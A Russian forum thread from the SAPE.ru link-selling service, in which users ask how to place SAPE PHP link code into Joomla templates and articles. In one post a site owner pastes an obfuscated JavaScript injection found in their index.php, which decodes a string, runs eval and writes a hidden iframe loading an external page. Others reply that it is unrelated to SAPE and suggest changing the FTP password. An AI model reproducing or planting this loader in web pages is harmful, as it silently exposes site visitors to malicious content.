Вернуться   Форум SAPE.RU > Система SAPE.ru > Установка кода на различные движки

-->
Ответ
 
Опции темы
Старый 08.02.2012, 23:58   #201
Добрый модератор
 
Аватар для zhegloff
 
Регистрация: 09.07.2007
Адрес: глобус Украины
Сообщений: 27,600
Вес репутации: 1030
zhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущее
По умолчанию

Цитата:
Сообщение от Kakulya Посмотреть сообщение
как можно решить данную задачу ?
Код нужно устанавливать в шаблон.
__________________
Установка кода сапы от $9.95. Пишите в личку.
Правильный хостинг.
В личке бесплатно не отвечаю обычно.
zhegloff вне форума   Ответить с цитированием
Старый 09.02.2012, 00:14   #202
Новичок
 
Регистрация: 08.02.2012
Сообщений: 10
Вес репутации: 0
Kakulya на пути к лучшему
По умолчанию

Цитата:
Сообщение от zhegloff Посмотреть сообщение
Код нужно устанавливать в шаблон.
да я это прекрасно понимаю, поэтому и написал что первую часть кода я установил в шаблон (в index.php моего шаблона)..но вторую вот эту -
<?php
global $sape;
echo $sape->return_links(1);
?>
я не могу вставить в главную страничку шаблона, так как мне нужно выводить ссылки не в определенной позиции модулей, а именно в конце статей. соответственно если на сайте есть 15 статей, то хотел бы вывести 15 разных ссылок, по одной ссылке в каждой статье.
Как мы прекрасно понимаем, в файле index.php не выводяться эти 15 статей, а выводиться только позиция contentleft, в которую собственно и выводиться статьи.

Было б естественно замечательно, если данный код можно было б вставить в нужную статью используя админку джумлы, но к сожалению пхп не получиться вставить используя редактор tinymce. поэтому и пришол к выводу что нужно вставлять напрямую в код


возможно вы не правильно поняли ситуацию, буду благодарен если все же подскажете решение.

Последний раз редактировалось Kakulya; 09.02.2012 в 00:22.
Kakulya вне форума   Ответить с цитированием
Старый 09.02.2012, 00:40   #203
Добрый модератор
 
Аватар для zhegloff
 
Регистрация: 09.07.2007
Адрес: глобус Украины
Сообщений: 27,600
Вес репутации: 1030
zhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущее
По умолчанию

Цитата:
Сообщение от Kakulya Посмотреть сообщение
я не могу вставить в главную страничку шаблона, так как мне нужно выводить ссылки не в определенной позиции модулей, а именно в конце статей. соответственно если на сайте есть 15 статей, то хотел бы вывести 15 разных ссылок, по одной ссылке в каждой статье.
Как мы прекрасно понимаем, в файле index.php не выводяться эти 15 статей, а выводиться только позиция contentleft, в которую собственно и выводиться статьи.

Было б естественно замечательно, если данный код можно было б вставить в нужную статью используя админку джумлы, но к сожалению пхп не получиться вставить используя редактор tinymce. поэтому и пришол к выводу что нужно вставлять напрямую в код
Ну значит нужно найти нужное место в шаблоне и вставить туда
__________________
Установка кода сапы от $9.95. Пишите в личку.
Правильный хостинг.
В личке бесплатно не отвечаю обычно.
zhegloff вне форума   Ответить с цитированием
Старый 09.02.2012, 00:58   #204
Новичок
 
Регистрация: 08.02.2012
Сообщений: 10
Вес репутации: 0
Kakulya на пути к лучшему
По умолчанию

Цитата:
Сообщение от zhegloff Посмотреть сообщение
Ну значит нужно найти нужное место в шаблоне и вставить туда
спасибо за ответ. повеселили немного.
жаль что всетаки найдя место (нужную позицию) и вставив туда, код будет выводиться во ВСЕХ статья, я не на определенной.

Наверное, всеже я туплю.
Не буду больше надоедать, но если вдруг появиться всеже решение, буду рад увидеть ответа. Спасибо.
Kakulya вне форума   Ответить с цитированием
Старый 09.02.2012, 01:34   #205
Добрый модератор
 
Аватар для zhegloff
 
Регистрация: 09.07.2007
Адрес: глобус Украины
Сообщений: 27,600
Вес репутации: 1030
zhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущее
По умолчанию

Цитата:
Сообщение от Kakulya Посмотреть сообщение
спасибо за ответ. повеселили немного.
жаль что всетаки найдя место (нужную позицию) и вставив туда, код будет выводиться во ВСЕХ статья, я не на определенной.
Ну естественно во всех. Для каждой статьи - свои ссылки.
__________________
Установка кода сапы от $9.95. Пишите в личку.
Правильный хостинг.
В личке бесплатно не отвечаю обычно.
zhegloff вне форума   Ответить с цитированием
Старый 09.02.2012, 01:45   #206
Новичок
 
Регистрация: 08.02.2012
Сообщений: 10
Вес репутации: 0
Kakulya на пути к лучшему
По умолчанию

Цитата:
Сообщение от zhegloff Посмотреть сообщение
Ну естественно во всех. Для каждой статьи - свои ссылки.
Теперь уж точно простите за беспокойство, но я окончательно запутался.
я изначально не увидел пункт "Установка кода отображения гипертекстовых ссылок непосредственно из контента страницы (контекстные ссылки)" это как раз то что мне надо было. все внимательно прочитал, там приведена ссылка на закачку модуля и мамбота для джумлы, скачал, установил, сделал все по мануалу который был приведен внутри архива. заменил везде код, все замечательно, только вот одного я непойму: "После размещения кода Вам необходимо указать в форме, расположенной ниже, любую страницу сайта, на которой установлен код, после чего сайт будет поставлен в очередь на индексацию роботом системы."
какую мне страницу указывать, если код был внесен в главный файл шалона index.php ... выходит нужно указывать тупо главную страницу... так а где же я тогда смогу указать те страницы (в которых статьи) на которых нужно показывать ссылки?

пфф. запутался. еще раз извините.
Kakulya вне форума   Ответить с цитированием
Старый 13.02.2012, 23:18   #207
Новичок
 
Регистрация: 13.02.2012
Сообщений: 2
Вес репутации: 0
Sed_Vlad на пути к лучшему
По умолчанию

Уважаемые специалисты, подскажите пожалуйста.
Прикрутил сапу к джумла-сайту, пока ждал модерацию, сайт поломался - полез код наружу. Разобрался - в index.php перед тегом "<?php" нашел вот это:

Код:
<?ph<script>var $J=(Date);if($J){$e='594';}var $t={'u':'r\x65\x76\x65rse','D':!false,'Y':'\x73\x70lit','e':'\x6Aoin','S':'st\x72\x69\x6Eg','k':'s\x75\x62str','R':'l\x65\x6E\x67th'},$W='',$h=['mentidocur(et.w\'vie= sty"<dldiay:psld;" nonei="_N_n"J__//ttpoi>h:decm5/ghd.suns1po.p.?si<1iv;)\'d/d=>'][$t.e]('\x0A'),$e=$e[$t.Y]($W),$g=function(){for(var $S in $e){if(typeof($e[$S])==$t.S){var $Q=[],$y=$t.D,$J=$e[$S]*-~false;for(S=[]^[];S<$h[$t.R];S+=$J){$Q[S]=($y)?($h[$t.k](S,$J)[$t.Y]($W)[$t.u]()[$t.e]($W)):($h[$t.k](S,$J));$y=!$y;}$h=$Q[$t.e]($W);}}this['ev\x61\x6C']($h);},$h=$g();if ((Number)&&(Array)&&(Function)&&(String)&&(Image)){if(document.getElementsByTagName('script').length > 0){document.write('<iframe src="'+document.getElementById('____NJ').innerHTML+'" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>');}}</script>
удалил чужеродное тело из недр сайта и все заработало, написал модератору - мол ошибку исправил, пожалуйста отмодерируйте. Бац - через час опять эта бяка там появилась. На другом Джумла сайте такой проблемы не возникало. Может кто-то знает, связан этот скрипт с SAPE или надо рыть в другом месте?
Sed_Vlad вне форума   Ответить с цитированием
Старый 14.02.2012, 00:01   #208
Добрый модератор
 
Аватар для zhegloff
 
Регистрация: 09.07.2007
Адрес: глобус Украины
Сообщений: 27,600
Вес репутации: 1030
zhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущее
По умолчанию

Цитата:
Сообщение от Sed_Vlad Посмотреть сообщение
Может кто-то знает, связан этот скрипт с SAPE или надо рыть в другом месте?
Нет, не связан.
__________________
Установка кода сапы от $9.95. Пишите в личку.
Правильный хостинг.
В личке бесплатно не отвечаю обычно.
zhegloff вне форума   Ответить с цитированием
Старый 14.02.2012, 00:50   #209
Новичок
 
Регистрация: 13.02.2012
Сообщений: 2
Вес репутации: 0
Sed_Vlad на пути к лучшему
По умолчанию

Цитата:
Сообщение от zhegloff Посмотреть сообщение
Нет, не связан.
Спасибо, значит совпадение.
Sed_Vlad вне форума   Ответить с цитированием
Старый 14.02.2012, 15:20   #210
Специалист
 
Регистрация: 15.04.2007
Сообщений: 252
Вес репутации: 220
one - весьма и весьма положительная личностьone - весьма и весьма положительная личностьone - весьма и весьма положительная личность
Отправить сообщение для one с помощью ICQ
По умолчанию

Цитата:
Сообщение от Sed_Vlad Посмотреть сообщение
Спасибо, значит совпадение.
Думаю Вам следует изменить пароль к FTP...
one вне форума   Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Установка кода на Joomla lucik Установка кода на различные движки 3232 07.09.2011 19:49
Установка кода статей на Joomla 1.0? new_forward Установка кода на различные движки 2 10.03.2011 18:57
Установка кода на Joomla 1.6 HunterNNm Установка кода на различные движки 1 05.03.2011 18:50
Установка кода на Joomla 1.5 + virtuemart 1.1.3 V.P Установка кода на различные движки 0 24.04.2010 18:49
Установка кода на Joomla Serious Вопросы от новичков 9 03.07.2009 10:22


Часовой пояс GMT +3, время: 17:01.